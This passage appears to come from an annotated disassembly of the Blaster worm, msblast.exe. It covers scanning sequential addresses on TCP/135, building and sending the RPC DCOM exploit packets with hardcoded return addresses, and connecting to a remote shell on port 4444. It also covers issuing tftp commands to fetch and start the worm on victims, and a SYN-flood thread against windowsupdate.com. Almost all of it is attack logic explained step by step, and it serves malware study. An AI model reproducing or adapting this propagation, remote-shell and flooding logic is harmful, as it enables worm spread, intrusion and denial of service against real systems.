ds:octet1, 0FEh ; keep 1st octet if now in range [0-254]; .text:0040176B jle short loc_401774 ; increment 4th octet again so addr is never x.0.0.0 .text:0040176D and ds:octet1, 0 ; otherwise, 1st octet rolls over to 0 .text:00401774 .text:00401774 loc_401774: ; CODE XREF: incrementOctets+5F^j .text:00401774 jmp short incrementOctets ; increment 4th octet again so addr is never x.0.0.0 .text:00401776 ; --------------------------------------------------------------------------- .text:00401776 .text:00401776 locret_401776: ; CODE XREF: incrementOctets+21^j .text:00401776 ; incrementOctets+2D^j ... .text:00401776 retn ; return .text:00401776 incrementOctets endp .text:00401776 .text:00401777 .text:00401777 ; =============== S U B R O U T I N E ======================================= .text:00401777 .text:00401777 ; Attributes: bp-based frame .text:00401777 .text:00401777 infect20Hosts proc near ; CODE XREF: WinMain+312^p .text:00401777 .text:00401777 var_18C = dword ptr -18Ch .text:00401777 writefds = fd_set ptr -188h .text:00401777 var_84 = byte ptr -84h .text:00401777 in = in_addr ptr -80h .text:00401777 namelen = dword ptr -74h .text:00401777 argp = dword ptr -70h .text:00401777 name = sockaddr ptr -6Ch .text:00401777 timeout = timeval ptr -5Ch .text:00401777 var_54 = dword ptr -54h .text:00401777 s = dword ptr -50h .text:00401777 .text:00401777 push ebp .text:00401778 mov ebp, esp .text:0040177A sub esp, 18Ch .text:00401780 push ebx .text:00401781 push esi .text:00401782 push edi .text:00401783 mov [ebp+argp], 1 ; set argp for ioctlsocket() to 1 (on) .text:0040178A push 10h .text:0040178C push 0 .text:0040178E lea eax, [ebp+name] .text:00401791 push eax .text:00401792 call memset .text:00401797 add esp, 0Ch .text:0040179A mov [ebp+name.sa_family], 2 ; AF_INET .text:004017A0 push 87h ; hostshort = port TCP/135 .text:004017A5 call htons .text:004017AA mov esi, eax .text:004017AC mov word ptr [ebp+name.sa_data], si .text:004017B0 xor edi, edi .text:004017B2 .text:004017B2 Create 20 non-blocking TCP/IP sockets .text:004017B2 .text:004017B2 loc_4017B2: ; CODE XREF: infect20Hosts+6Bvj .text:004017B2 push 0 ; protocol = IPPROTO_IP .text:004017B4 push 1 ; type = SOCK_STREAM .text:004017B6 push 2 ; af = AF_INET .text:004017B8 call socket .text:004017BD mov [ebp+edi*4+s], eax .text:004017C1 cmp [ebp+edi*4+s], 0FFFFFFFFh .text:004017C6 jz loc_401924 ; return .text:004017CC lea eax, [ebp+argp] .text:004017CF push eax ; argp = 1 (on) .text:004017D0 push 8004667Eh ; cmd = FIONBIO .text:004017D5 push [ebp+edi*4+s] ; s[EDI] .text:004017D9 call ioctlsocket .text:004017DE inc edi .text:004017DF cmp edi, 14h .text:004017E2 jl short loc_4017B2 ; loop 20 times .text:004017E4 xor edi, edi .text:004017E6 .text:004017E6 Try to connect sockets to port TCP/135 on 20 sequential IP addresses .text:004017E6 .text:004017E6 loc_4017E6: ; CODE XREF: infect20Hosts+CDvj .text:004017E6 call incrementOctets ; connect loop -- executed 20 times .text:004017EB push ds:octet4 .text:004017F1 push ds:octet3 .text:004017F7 push ds:octet2 .text:004017FD push ds:octet1 .text:00401803 push offset aI_I_I_I ; "%i.%i.%i.%i" .text:00401808 push offset cp .text:0040180D call sprintf ; convert four octets into a string .text:00401812 add esp, 18h .text:00401815 push offset cp ; cp .text:0040181A call inet_addr ; now convert string into DWORD .text:0040181F mov [ebp+var_54], eax .text:00401822 cmp eax, 0FFFFFFFFh .text:00401825 jz loc_401924 ; return .text:0040182B mov eax, [ebp+var_54] .text:0040182E mov dword ptr [ebp+name.sa_data+2], eax .text:00401831 push 10h ; namelen .text:00401833 lea eax, [ebp+name] .text:00401836 push eax ; name .text:00401837 push [ebp+edi*4+s] ; s[EDI] .text:0040183B call connect .text:00401840 inc edi .text:00401841 cmp edi, 14h .text:00401844 jl short loc_4017E6 ; connect loop -- executed 20 times .text:00401846 push 708h ; dwMilliseconds .text:0040184B call Sleep ; wait 1.8 seconds .text:00401850 xor edi, edi .text:00401852 .text:00401852 Look for connected sockets by doing a select() on each s[EDI] (EDI=0..19) .text:00401852 .text:00401852 loc_401852: ; CODE XREF: infect20Hosts+1A7vj .text:00401852 and [ebp+timeout.tv_sec], 0 .text:00401856 and [ebp+timeout.tv_usec], 0 ; zero out timeval struct .text:00401856 ; (timeout of 0 = return instantly) .text:0040185A and [ebp+writefds.fd_count], 0 ; FD_ZERO(&writefds) .text:00401861 .text:00401861 --- start of FD_SET macro code .text:00401861 .text:00401861 and [ebp+var_18C], 0 ; FD_SET(s[EDI], &writefds) .text:00401868 jmp short loc_401883 .text:0040186A ; --------------------------------------------------------------------------- .text:0040186A .text:0040186A loc_40186A: ; CODE XREF: infect20Hosts+118vj .text:0040186A mov esi, [ebp+var_18C] .text:00401870 mov ebx, [ebp+edi*4+s] ; EDI = index into s[] socket array .text:00401870 ; EBX = socket s[EDI] .text:00401874 cmp [ebp+esi*4+writefds.fd_array], ebx .text:0040187B jz short loc_401891 .text:0040187D inc [ebp+var_18C] .text:00401883 .text:00401883 loc_401883: ; CODE XREF: infect20Hosts+F1^j .text:00401883 mov eax, [ebp+writefds.fd_count] .text:00401889 cmp [ebp+var_18C], eax .text:0040188F jb short loc_40186A .text:00401891 .text:00401891 loc_401891: ; CODE XREF: infect20Hosts+104^j .text:00401891 mov eax, [ebp+writefds.fd_count] .text:00401897 cmp [ebp+var_18C], eax .text:0040189D jnz short loc_4018BB .text:0040189F cmp eax, 40h .text:004018A2 jnb short loc_4018BB .text:004018A4 mov esi, [ebp+var_18C] .text:004018AA mov ebx, [ebp+edi*4+s] .text:004018AE mov [ebp+esi*4+writefds.fd_array], ebx .text:004018B5 inc [ebp+writefds.fd_count] .text:004018B5 .text:004018B5 --- end of FD_SET macro code .text:004018BB .text:004018BB loc_4018BB: ; CODE XREF: infect20Hosts+126^j .text:004018BB ; infect20Hosts+12B^j .text:004018BB lea eax, [ebp+timeout] .text:004018BE push eax ; timeout .text:004018BF push 0 ; exceptfds .text:004018C1 lea eax, [ebp+writefds] .text:004018C7 push eax ; writefds .text:004018C8 push 0 ; readfds .text:004018CA push 0 ; nfds .text:004018CC call select ; writefds will be list of connected sockets .text:004018D1 cmp eax, 1 .text:004018D4 jge short loc_4018E1 ; did select() succeed? .text:004018D6 push [ebp+edi*4+s] ; s .text:004018DA call closesocket ; close socket s[EDI] if select() failed .text:004018DF jmp short loc_40191A ; advance to next iteration of loop .text:004018E1 ; --------------------------------------------------------------------------- .text:004018E1 .text:004018E1 loc_4018E1: ; CODE XREF: infect20Hosts+15D^j .text:004018E1 mov [ebp+namelen], 10h .text:004018E8 lea eax, [ebp+namelen] .text:004018EB push eax ; namelen .text:004018EC lea eax, [ebp+var_84] .text:004018F2 push eax ; name .text:004018F3 push [ebp+edi*4+s] ; s .text:004018F7 call getpeername .text:004018FC push dword ptr [ebp+in.S_un] ; in .text:004018FF call inet_ntoa .text:00401904 push eax ; szIPAddr: string representation of IP address to infect .text:00401905 push [ebp+edi*4+s] ; s: socket connected to remote TCP/135 .text:00401909 call infectTarget ; infect a single host by sending command .text:00401909 ; shell exploit and issuing command to .text:00401909 ; download worm executable via TFTP .text:0040190E add esp, 8 .text:00401911 push [ebp+edi*4+s] ; s .text:00401915 call closesocket ; close TCP/135 socket .text:0040191A .text:0040191A loc_40191A: ; CODE XREF: infect20Hosts+168^j .text:0040191A inc edi .text:0040191B cmp edi, 14h .text:0040191E jl loc_401852 ; check each of the 20 sockets in array for connection .text:00401924 .text:00401924 loc_401924: ; CODE XREF: infect20Hosts+4F^j .text:00401924 ; infect20Hosts+AE^j .text:00401924 pop edi ; return .text:00401925 pop esi .text:00401926 pop ebx .text:00401927 leave .text:00401928 retn .text:00401928 infect20Hosts endp .text:00401928 .text:00401929 .text:00401929 ; =============== S U B R O U T I N E ======================================= .text:00401929 .text:00401929 ; Attributes: bp-based frame .text:00401929 .text:00401929 ; int __cdecl infectTarget(SOCKET s,char *szIPAddr) .text:00401929 infectTarget proc near ; CODE XREF: infect20Hosts+192^p .text:00401929 .text:00401929 ThreadId = dword ptr -1934h .text:00401929 var_1930 = dword ptr -1930h .text:00401929 namelen = dword ptr -192Ch .text:00401929 var_1928 = byte ptr -1928h .text:00401929 var_18F8 = byte ptr -18F8h .text:00401929 var_18BC = byte ptr -18BCh .text:00401929 buf = byte ptr -155Ch .text:00401929 var_1514 = dword ptr -1514h .text:00401929 argp = dword ptr -1510h .text:00401929 var_150C = byte ptr -150Ch .text:00401929 var_14E8 = byte ptr -14E8h .text:00401929 hObject = dword ptr -1240h .text:00401929 var_123C = dword ptr -123Ch .text:00401929 name = sockaddr ptr -1238h .text:00401929 var_1228 = byte ptr -1228h .text:00401929 var_1224 = byte ptr -1224h .text:00401929 var_1223 = byte ptr -1223h .text:00401929 var_1222 = byte ptr -1222h .text:00401929 var_1221 = byte ptr -1221h .text:00401929 var_1218 = dword ptr -1218h .text:00401929 var_1210 = dword ptr -1210h .text:00401929 var_1208 = dword ptr -1208h .text:00401929 var_1204 = byte ptr -1204h .text:00401929 len = dword ptr -1004h .text:00401929 var_1000 = byte ptr -1000h .text:00401929 var_FF8 = dword ptr -0FF8h .text:00401929 var_FF0 = dword ptr -0FF0h .text:00401929 var_F80 = dword ptr -0F80h .text:00401929 var_F7C = dword ptr -0F7Ch .text:00401929 var_F4C = dword ptr -0F4Ch .text:00401929 var_F48 = dword ptr -0F48h .text:00401929 var_F30 = dword ptr -0F30h .text:00401929 var_E74 = dword ptr -0E74h .text:00401929 s = dword ptr 8 .text:00401929 szIPAddr = dword ptr 0Ch .text:00401929 .text:00401929 push ebp ; flags .text:0040192A mov ebp, esp .text:0040192C mov eax, 2934h .text:00401931 call allocstackspace ; used when > 4KB stack space needed .text:00401936 push ebx ; len .text:00401937 push esi ; buf .text:00401938 push edi ; s .text:00401939 and [ebp+argp], 0 ; set argp for ioctlsocket() to 0 (off) .text:00401940 lea eax, [ebp+argp] .text:00401946 push eax ; argp = 0 (off) .text:00401947 push 8004667Eh ; cmd = FIONBIO .text:0040194C push [ebp+s] ; s .text:0040194F call ioctlsocket ; make sure socket does blocking I/O .text:00401954 cmp ds:dwWhichRetAddr, 1 ; 80% chance set to 1 (XP), 20% set to 2 (2000) .text:0040195B jnz short loc_401969 ; 2000 "universal" return address (20% probability) .text:0040195B ; 0018759Fh is a "CALL EBX" in unicode.nls .text:0040195D .text:0040195D Assemble RPC DCOM exploit packets .text:0040195D .text:0040195D mov [ebp+var_1514], 100139Dh ; XP "universal" return address (80% probability) .text:0040195D ; 0100139Dh is a "CALL EBX" in svchost.exe .text:00401967 jmp short loc_401973 .text:00401969 ; --------------------------------------------------------------------------- .text:00401969 .text:00401969 loc_401969: ; CODE XREF: infectTarget+32^j .text:00401969 mov [ebp+var_1514], 18759Fh ; 2000 "universal" return address (20% probability) .text:00401969 ; 0018759Fh is a "CALL EBX" in unicode.nls .text:00401973 .text:00401973 loc_401973: ; CODE XREF: infectTarget+3E^j .text:00401973 lea edi, [ebp+buf] .text:00401979 lea esi, ds:4040C0h ; bindstr[] .text:0040197F mov ecx, 12h ; size = 0048h (72) .text:00401984 rep movsd .text:00401986 lea edi, [ebp+var_18BC] .text:0040198C lea esi, ds:404108h ; request1[] .text:00401992 mov ecx, 0D8h ; size = 0360h (864) .text:00401997 rep movsd .text:00401999 lea edi, [ebp+var_1218] .text:0040199F lea esi, ds:404468h ; request2[] .text:004019A5 mov ecx, 4 ; size = 0010h (16) .text:004019AA rep movsd .text:004019AC lea edi, [ebp+var_18F8] .text:004019B2 lea esi, ds:404478h ; request3[] .text:004019B8 mov ecx, 0Fh ; size = 003Ch (60) .text:004019BD rep movsd .text:004019BF lea edi, [ebp+var_150C] .text:004019C5 lea esi, ds:4044B4h ; sc .text:004019CB mov ecx, 0B3h ; size = 02CCh (716) .text:004019D0 rep movsd .text:004019D2 lea edi, [ebp+var_1928] .text:004019D8 lea esi, ds:404780h ; request4[] .text:004019DE mov ecx, 0Ch ; size = 0030h (48) .text:004019E3 rep movsd .text:004019E5 push 4 .text:004019E7 lea eax, [ebp+var_1514] .text:004019ED push eax .text:004019EE lea eax, [ebp+var_14E8] .text:004019F4 push eax .text:004019F5 call memcpy .text:004019FA mov [ebp+var_1930], 2CCh .text:00401A04 push 360h .text:00401A09 lea eax, [ebp+var_18BC] .text:00401A0F push eax .text:00401A10 lea eax, [ebp+var_1000] .text:00401A16 push eax .text:00401A17 call memcpy .text:00401A1C mov [ebp+len], 360h .text:00401A26 add [ebp+var_1218], 166h .text:00401A30 mov eax, [ebp+var_1210] .text:00401A36 add eax, 166h .text:00401A3B mov [ebp+var_1210], eax .text:00401A41 push 10h .text:00401A43 lea eax, [ebp+var_1218] .text:00401A49 push eax .text:00401A4A lea eax, [ebp+var_1000] .text:00401A50 add eax, 360h .text:00401A55 push eax .text:00401A56 call memcpy .text:00401A5B mov [ebp+len], 370h .text:00401A65 push 2CCh .text:00401A6A lea eax, [ebp+var_150C] .text:00401A70 push eax .text:00401A71 lea eax, [ebp+var_1000] .text:00401A77 add eax, 370h .text:00401A7C push eax .text:00401A7D call memcpy .text:00401A82 mov [ebp+len], 63Ch .text:00401A8C push 3Ch .text:00401A8E lea eax, [ebp+var_18F8] .text:00401A94 push eax .text:00401A95 lea eax, [ebp+var_1000] .text:00401A9B add eax, 63Ch .text:00401AA0 push eax .text:00401AA1 call memcpy .text:00401AA6 mov [ebp+len], 678h .text:00401AB0 push 30h .text:00401AB2 lea eax, [ebp+var_1928] .text:00401AB8 push eax .text:00401AB9 lea eax, [ebp+var_1000] .text:00401ABF add eax, 678h .text:00401AC4 push eax .text:00401AC5 call memcpy .text:00401ACA add esp, 48h .text:00401ACD mov [ebp+len], 6A8h .text:00401AD7 mov eax, [ebp+var_FF8] .text:00401ADD add eax, 2C0h .text:00401AE2 mov [ebp+var_FF8], eax .text:00401AE8 mov eax, [ebp+var_FF0] .text:00401AEE add eax, 2C0h .text:00401AF3 mov [ebp+var_FF0], eax .text:00401AF9 mov eax, [ebp+var_F80] .text:00401AFF add eax, 2C0h .text:00401B04 mov [ebp+var_F80], eax .text:00401B0A mov eax, [ebp+var_F7C] .text:00401B10 add eax, 2C0h .text:00401B15 mov [ebp+var_F7C], eax .text:00401B1B mov eax, [ebp+var_F4C] .text:00401B21 add eax, 2C0h .text:00401B26 mov [ebp+var_F4C], eax .text:00401B2C mov eax, [ebp+var_F48] .text:00401B32 add eax, 2C0h .text:00401B37 mov [ebp+var_F48], eax .text:00401B3D mov eax, [ebp+var_F30] .text:00401B43 add eax, 2C0h .text:00401B48 mov [ebp+var_F30], eax .text:00401B4E mov eax, [ebp+var_E74] .text:00401B54 add eax, 2C0h .text:00401B59 mov [ebp+var_E74], eax .text:00401B5F push 0 ; flags .text:00401B61 push 48h ; len .text:00401B63 lea eax, [ebp+buf] .text:00401B69 push eax ; buf .text:00401B6A push [ebp+s] ; s .text:00401B6D call send ; send RPC bind packet (bindstr[]) .text:00401B72 cmp eax, 0FFFFFFFFh .text:00401B75 jz loc_401E3B ; return .text:00401B7B push 0 ; flags .text:00401B7D push [ebp+len] ; len .text:00401B83 lea eax, [ebp+var_1000] .text:00401B89 push eax ; buf .text:00401B8A push [ebp+s] ; s .text:00401B8D call send ; send assembled DCOM REMACT exploit packet .text:00401B92 cmp eax, 0FFFFFFFFh .text:00401B95 jz loc_401E3B ; return .text:00401B9B push [ebp+s] ; s .text:00401B9E call closesocket ; close TCP/135 socket .text:00401BA3 push 190h ; dwMilliseconds .text:00401BA8 call Sleep ; sleep for 0.4 seconds .text:00401BAD .text:00401BAD Connect to remote command shell .text:00401BAD .text:00401BAD push 0 ; protocol = IPPROTO_TCP .text:00401BAF push 1 ; type = SOCK_STREAM .text:00401BB1 push 2 ; af = AF_INET .text:00401BB3 call socket ; create new TCP/IP socket for connecting to command shell .text:00401BB8 mov [ebp+var_1208], eax .text:00401BBE cmp eax, 0FFFFFFFFh .text:00401BC1 jz loc_401E3B ; return .text:00401BC7 push 10h .text:00401BC9 push 0 .text:00401BCB lea eax, [ebp+name] .text:00401BD1 push eax .text:00401BD2 call memset .text:00401BD7 add esp, 0Ch .text:00401BDA mov [ebp+name.sa_family], 2 .text:00401BE3 push 115Ch ; hostshort = 4444 .text:00401BE8 call htons .text:00401BED mov edi, eax .text:00401BEF mov word ptr [ebp+name.sa_data], di .text:00401BF6 push [ebp+szIPAddr] ; cp .text:00401BF9 call inet_addr .text:00401BFE mov [ebp+var_123C], eax .text:00401C04 cmp eax, 0FFFFFFFFh .text:00401C07 jz loc_401E3B ; return .text:00401C0D mov eax, [ebp+var_123C] .text:00401C13 mov dword ptr [ebp+name.sa_data+2], eax .text:00401C19 push 10h ; namelen .text:00401C1B lea eax, [ebp+name] .text:00401C21 push eax ; name .text:00401C22 push [ebp+var_1208] ; s .text:00401C28 call connect ; attempt to connect to command shell on port TCP/4444 .text:00401C2D cmp eax, 0FFFFFFFFh .text:00401C30 jz loc_401E3B ; return .text:00401C36 .text:00401C36 Start TFTP server thread and send TFTP command .text:00401C36 .text:00401C36 push 10h .text:00401C38 push 0 .text:00401C3A push offset cp .text:00401C3F call memset .text:00401C44 mov [ebp+namelen], 10h .text:00401C4E push 10h .text:00401C50 push 0 .text:00401C52 lea eax, [ebp+var_1228] .text:00401C58 push eax .text:00401C59 call memset .text:00401C5E lea eax, [ebp+namelen] .text:00401C64 push eax ; namelen .text:00401C65 lea eax, [ebp+var_1228] .text:00401C6B push eax ; name .text:00401C6C push [ebp+var_1208] ; s .text:00401C72 call getsockname .text:00401C77 movzx eax, [ebp+var_1221] .text:00401C7E push eax .text:00401C7F movzx eax, [ebp+var_1222] .text:00401C86 push eax .text:00401C87 movzx eax, [ebp+var_1223] .text:00401C8E push eax .text:00401C8F movzx eax, [ebp+var_1224] .text:00401C96 push eax .text:00401C97 push offset aD_D_D_D ; "%d.%d.%d.%d" .text:00401C9C push offset cp .text:00401CA1 call sprintf .text:00401CA6 add esp, 30h .text:00401CA9 cmp ds:s, 0 .text:00401CB0 jz short loc_401CBD .text:00401CB2 push ds:s ; s .text:00401CB8 call closesocket .text:00401CBD .text:00401CBD loc_401CBD: ; CODE XREF: infectTarget+387^j .text:00401CBD lea eax, [ebp+ThreadId] .text:00401CC3 push eax ; lpThreadId .text:00401CC4 push 0 ; dwCreationFlags .text:00401CC6 push 0 ; lpParameter .text:00401CC8 push offset TFTPServerThread ; lpStartAddress .text:00401CCD push 0 ; dwStackSize .text:00401CCF push 0 ; lpThreadAttributes .text:00401CD1 call CreateThread .text:00401CD6 mov [ebp+hObject], eax .text:00401CDC push 50h ; dwMilliseconds .text:00401CDE call Sleep ; sleep for 80ms .text:00401CE3 push offset aMsblast_exe ; "msblast.exe" .text:00401CE8 push offset cp .text:00401CED push offset aTftpISGetS ; "tftp -i %s GET %s\n" .text:00401CF2 lea eax, [ebp+var_1204] .text:00401CF8 push eax .text:00401CF9 call sprintf ; create command string for downloading worm exe via TFTP .text:00401CFE add esp, 10h .text:00401D01 lea ecx, [ebp+var_1204] .text:00401D07 or eax, 0FFFFFFFFh .text:00401D0A .text:00401D0A loc_401D0A: ; CODE XREF: infectTarget+3E6vj .text:00401D0A inc eax .text:00401D0B cmp byte ptr [ecx+eax], 0 .text:00401D0F jnz short loc_401D0A .text:00401D11 push 0 ; flags .text:00401D13 push eax ; len .text:00401D14 lea eax, [ebp+var_1204] .text:00401D1A push eax ; buf .text:00401D1B push [ebp+var_1208] ; s .text:00401D21 call send ; send "tftp -i GET msblast.exe " command .text:00401D26 cmp eax, 1 .text:00401D29 jl loc_401DEB .text:00401D2F push 3E8h ; dwMilliseconds .text:00401D34 call Sleep ; sleep for 1 second .text:00401D39 xor ebx, ebx .text:00401D3B jmp short loc_401D48 .text:00401D3D ; --------------------------------------------------------------------------- .text:00401D3D .text:00401D3D loc_401D3D: ; CODE XREF: infectTarget+42Bvj .text:00401D3D push 7D0h ; dwMilliseconds .text:00401D42 call Sleep ; sleep for 2 seconds .text:00401D47 inc ebx .text:00401D48 .text:00401D48 loc_401D48: ; CODE XREF: infectTarget+412^j .text:00401D48 cmp ebx, 0Ah .text:00401D4B jge short loc_401D56 .text:00401D4D cmp dwTFTPInProgress, 0 ; is TFTP transfer finished? .text:00401D54 jnz short loc_401D3D ; loop up to 10 times waiting for TFTP server to finish .text:00401D56 .text:00401D56 loc_401D56: ; CODE XREF: infectTarget+422^j .text:00401D56 push offset aMsblast_exe ; "msblast.exe" .text:00401D5B push offset aStartS ; "start %s\n" .text:00401D60 lea eax, [ebp+var_1204] .text:00401D66 push eax .text:00401D67 call sprintf ; create command string .text:00401D6C add esp, 0Ch .text:00401D6F lea ecx, [ebp+var_1204] .text:00401D75 or eax, 0FFFFFFFFh .text:00401D78 .text:00401D78 loc_401D78: ; CODE XREF: infectTarget+454vj .text:00401D78 inc eax .text:00401D79 cmp byte ptr [ecx+eax], 0 .text:00401D7D jnz short loc_401D78 .text:00401D7F push 0 ; flags .text:00401D81 push eax ; len .text:00401D82 lea eax, [ebp+var_1204] .text:00401D88 push eax ; buf .text:00401D89 push [ebp+var_1208] ; s .text:00401D8F call send ; send "start msblast.exe " command .text:00401D94 cmp eax, 1 .text:00401D97 jl short loc_401DEB .text:00401D99 push 7D0h ; dwMilliseconds .text:00401D9E call Sleep ; sleep two seconds .text:00401DA3 push offset aMsblast_exe ; "msblast.exe" .text:00401DA8 push offset aS_0 ; "%s\n" .text:00401DAD lea eax, [ebp+var_1204] .text:00401DB3 push eax .text:00401DB4 call sprintf ; create command string .text:00401DB9 add esp, 0Ch .text:00401DBC lea ecx, [ebp+var_1204] .text:00401DC2 or eax, 0FFFFFFFFh .text:00401DC5 .text:00401DC5 loc_401DC5: ; CODE XREF: infectTarget+4A1vj .text:00401DC5 inc eax .text:00401DC6 cmp byte ptr [ecx+eax], 0 .text:00401DCA jnz short loc_401DC5 .text:00401DCC push 0 ; flags .text:00401DCE push eax ; len .text:00401DCF lea eax, [ebp+var_1204] .text:00401DD5 push eax ; buf .text:00401DD6 push [ebp+var_1208] ; s .text:00401DDC call send ; now send "msblast.exe " command .text:00401DE1 push 7D0h ; dwMilliseconds .text:00401DE6 call Sleep ; sleep for 2 seconds .text:00401DEB .text:00401DEB loc_401DEB: ; CODE XREF: infectTarget+400^j .text:00401DEB ; infectTarget+46E^j .text:00401DEB cmp [ebp+var_1208], 0 .text:00401DF2 jz short loc_401DFF .text:00401DF4 push [ebp+var_1208] ; s .text:00401DFA call closesocket .text:00401DFF .text:00401DFF loc_401DFF: ; CODE XREF: infectTarget+4C9^j .text:00401DFF cmp dwTFTPInProgress, 0 .text:00401E06 jz short loc_401E27 .text:00401E08 push 0 ; dwExitCode .text:00401E0A push [ebp+hObject] ; hThread .text:00401E10 call TerminateThread ; kill TFTP server thread if it's not done already .text:00401E15 push ds:s ; s .text:00401E1B call closesocket .text:00401E20 and dwTFTPInProgress, 0 .text:00401E27 .text:00401E27 loc_401E27: ; CODE XREF: infectTarget+4DD^j .text:00401E27 cmp [ebp+hObject], 0 .text:00401E2E jz short loc_401E3B ; return .text:00401E30 push [ebp+hObject] ; hObject .text:00401E36 call CloseHandle ; close handle to TFTP server thread .text:00401E3B .text:00401E3B loc_401E3B: ; CODE XREF: infectTarget+24C^j .text:00401E3B ; infectTarget+26C^j ... .text:00401E3B pop edi ; return .text:00401E3C pop esi .text:00401E3D pop ebx .text:00401E3E leave .text:00401E3F retn .text:00401E3F infectTarget endp .text:00401E3F .text:00401E40 .text:00401E40 ; =============== S U B R O U T I N E ======================================= .text:00401E40 .text:00401E40 .text:00401E40 computeChecksum proc near ; CODE XREF: sendTCP80SYN+1AEvp .text:00401E40 ; sendTCP80SYN+1EAvp .text:00401E40 .text:00401E40 lpData = dword ptr 8 .text:00401E40 dwLength = dword ptr 0Ch .text:00401E40 .text:00401E40 push ebx .text:00401E41 mov ebx, [esp+lpData] .text:00401E45 mov ecx, [esp+dwLength] .text:00401E49 xor edx, edx .text:00401E4B jmp short loc_401E5A .text:00401E4D ; --------------------------------------------------------------------------- .text:00401E4D .text:00401E4D loc_401E4D: ; CODE XREF: computeChecksum+1Dvj .text:00401E4D mov eax, ebx .text:00401E4F add ebx, 2 .text:00401E52 movzx eax, word ptr [eax] .text:00401E55 add edx, eax .text:00401E57 sub ecx, 2 .text:00401E5A .text:00401E5A loc_401E5A: ; CODE XREF: computeChecksum+B^j .text:00401E5A cmp ecx, 1 .text:00401E5D jg short loc_401E4D .text:00401E5F or ecx, ecx .text:00401E61 jz short loc_401E68 .text:00401E63 movzx eax, byte ptr [ebx] .text:00401E66 add edx, eax .text:00401E68 .text:00401E68 loc_401E68: ; CODE XREF: computeChecksum+21^j .text:00401E68 mov ecx, edx .text:00401E6A shr ecx, 10h .text:00401E6D mov ebx, edx .text:00401E6F and ebx, 0FFFFh .text:00401E75 mov edx, ecx .text:00401E77 add edx, ebx .text:00401E79 mov ecx, edx .text:00401E7B shr ecx, 10h .text:00401E7E add edx, ecx .text:00401E80 mov eax, edx .text:00401E82 not eax .text:00401E84 and eax, 0FFFFh .text:00401E89 pop ebx .text:00401E8A retn .text:00401E8A computeChecksum endp .text:00401E8A .text:00401E8B .text:00401E8B ; =============== S U B R O U T I N E ======================================= .text:00401E8B .text:00401E8B ; Attributes: bp-based frame .text:00401E8B .text:00401E8B ; int __cdecl lookupIPAddr(char *name) .text:00401E8B lookupIPAddr proc near ; CODE XREF: WUSYNFloodThread+13vp .text:00401E8B ; sendTCP80SYN+7Evp .text:00401E8B .text:00401E8B name = dword ptr 8 .text:00401E8B .text:00401E8B push ebp .text:00401E8C mov ebp, esp .text:00401E8E push esi .text:00401E8F push edi .text:00401E90 push [ebp+name] ; cp .text:00401E93 call inet_addr .text:00401E98 mov edi, eax .text:00401E9A xor esi, esi .text:00401E9C cmp edi, 0FFFFFFFFh .text:00401E9F jnz short loc_401EBB .text:00401EA1 push [ebp+name] ; name .text:00401EA4 call gethostbyname .text:00401EA9 mov esi, eax .text:00401EAB or esi, esi .text:00401EAD jnz short loc_401EB4 .text:00401EAF or eax, 0FFFFFFFFh .text:00401EB2 jmp short loc_401EBD .text:00401EB4 ; --------------------------------------------------------------------------- .text:00401EB4 .text:00401EB4 loc_401EB4: ; CODE XREF: lookupIPAddr+22^j .text:00401EB4 mov eax, [esi+0Ch] .text:00401EB7 mov eax, [eax] .text:00401EB9 mov edi, [eax] .text:00401EBB .text:00401EBB loc_401EBB: ; CODE XREF: lookupIPAddr+14^j .text:00401EBB mov eax, edi .text:00401EBD .text:00401EBD loc_401EBD: ; CODE XREF: lookupIPAddr+27^j .text:00401EBD pop edi .text:00401EBE pop esi .text:00401EBF pop ebp .text:00401EC0 retn .text:00401EC0 lookupIPAddr endp .text:00401EC0 .text:00401EC1 .text:00401EC1 ; =============== S U B R O U T I N E ======================================= .text:00401EC1 .text:00401EC1 ; Attributes: bp-based frame .text:00401EC1 .text:00401EC1 ; DWORD __stdcall WUSYNFloodThread(LPVOID) .text:00401EC1 WUSYNFloodThread proc near ; DATA XREF: WinMain+304^o .text:00401EC1 .text:00401EC1 optval = byte ptr -4 .text:00401EC1 .text:00401EC1 push ebp .text:00401EC2 mov ebp, esp .text:00401EC4 push ecx .text:00401EC5 push ebx .text:00401EC6 push esi .text:00401EC7 push edi ; s .text:00401EC8 mov dword ptr [ebp+optval], 1 .text:00401ECF push offset aWindowsupdate_ ; name .text:00401ED4 call lookupIPAddr ; get IP address of "windowsupdate.com" .text:00401ED9 pop ecx .text:00401EDA mov esi, eax .text:00401EDC push 1 ; dwFlags .text:00401EDE push 0 ; g .text:00401EE0 push 0 ; lpProtocolInfo .text:00401EE2 push 0FFh ; protocol .text:00401EE7 push 3 ; type .text:00401EE9 push 2 ; af .text:00401EEB call WSASocketA ; create raw IP socket .text:00401EF0 mov edi, eax .text:00401EF2 cmp eax, 0FFFFFFFFh .text:00401EF5 jnz short loc_401EFB .text:00401EF7 xor eax, eax .text:00401EF9 jmp short loc_401F2F ; return 0 .text:00401EFB ; --------------------------------------------------------------------------- .text:00401EFB .text:00401EFB loc_401EFB: ; CODE XREF: WUSYNFloodThread+34^j .text:00401EFB push 4 ; optlen .text:00401EFD lea eax, [ebp+optval] .text:00401F00 push eax ; optval .text:00401F01 push 2 ; optname .text:00401F03 push 0 ; level .text:00401F05 push edi ; s .text:00401F06 call setsockopt .text:00401F0B cmp eax, 0FFFFFFFFh .text:00401F0E jnz short loc_401F14 ; raw IP socket to use .text:00401F10 xor eax, eax .text:00401F12 jmp short loc_401F2F .text:00401F14 ; --------------------------------------------------------------------------- .text:00401F14 .text:00401F14 loc_401F14: ; CODE XREF: WUSYNFloodThread+4D^j .text:00401F14 ; WUSYNFloodThread+64vj .text:00401F14 push edi ; raw IP socket to use .text:00401F15 push esi ; destination IP address (windowsupdate.com) .text:00401F16 call sendTCP80SYN .text:00401F1B add esp, 8 .text:00401F1E push 14h ; dwMilliseconds .text:00401F20 call Sleep ; sleep for 20ms between SYN packets .text:00401F25 jmp short loc_401F14 ; raw IP socket to use .text:00401F27 ; --------------------------------------------------------------------------- .text:00401F27 push edi .text:00401F28 call closesocket .text:00401F2D xor eax, eax .text:00401F2F .text:00401F2F loc_401F2F: ; CODE XREF: WUSYNFloodThread+38^j .text:00401F2F ; WUSYNFloodThread+51^j .text:00401F2F pop edi .text:00401F30 pop esi .text:00401F31 pop ebx .text:00401F32 leave .text:00401F33 retn 4 .text:00401F33 WUSYNFloodThread endp .text:00401F33 .text:00401F36 IPv4 header: .text:00401F36 .text:00401F36 -14 BYTE version / header len .text:00401F36 -13 BYTE type of service .text:00401F36 -12 WORD total length .text:00401F36 -10 WORD identification .text:00401F36 -0E BYTE flags .text:00401F36 -0D BYTE frag offset .text:00401F36 -0C 